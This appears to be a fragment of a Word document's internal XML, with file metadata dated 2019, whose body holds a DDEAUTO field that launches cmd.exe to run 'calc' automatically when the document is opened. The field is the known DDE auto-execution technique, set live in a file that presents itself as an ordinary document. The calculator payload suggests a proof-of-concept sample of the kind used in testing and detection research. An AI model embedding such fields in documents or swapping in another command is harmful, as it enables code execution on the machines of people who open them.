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A13" w:rsidRPr="00E90A13" w:rsidRDefault="00E90A13" w:rsidP="00E90A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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E90A13">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:instrText>DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc"</w:instrText>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E32AF" w:rsidRDefault="00E90A13">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003E32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13"/>
    <w:rsid w:val="00464640"/>
    <w:rsid w:val="00625064"/>
    <w:rsid w:val="007F009D"/>
    <w:rsid w:val="00A61EE9"/>
    <w:rsid w:val="00C90415"/>
    <w:rsid w:val="00E90A13"/>
    <w:rsid w:val="00E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F10A-0F3C-4FBB-A951-B3AC171B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A13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E90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bremer</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>chen bremer</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-01-01T14:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-01T14:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>